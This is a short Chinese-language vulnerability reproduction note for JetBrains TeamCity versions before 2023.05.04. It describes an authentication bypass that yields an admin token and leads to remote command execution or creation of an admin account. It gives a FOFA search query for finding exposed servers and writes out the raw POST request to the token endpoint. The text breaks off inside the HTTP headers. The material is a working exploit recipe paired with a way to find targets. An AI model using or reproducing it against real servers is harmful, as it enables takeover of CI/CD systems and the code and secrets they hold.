0x01 产品简介
JetBrains TeamCity 是 JetBrains 公司开发的一款通用 CI/CD 软件平台。
0x02 漏洞概述
JetBrains TeamCity 可通过访问 /app/rest/users/{ {id}}/tokens/RPC2 端点获取对应 id 用户的有效 token,携带 admin token 访问受限端点导致远程命令执行或创建后台管理员用户。
0x03 影响范围
TeamCity On-Premises version < 2023.05.04
0x04 复现环境
FOFA:body="Log in to TeamCity"
0x05 漏洞复现
获取id为1用户的tooken
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) V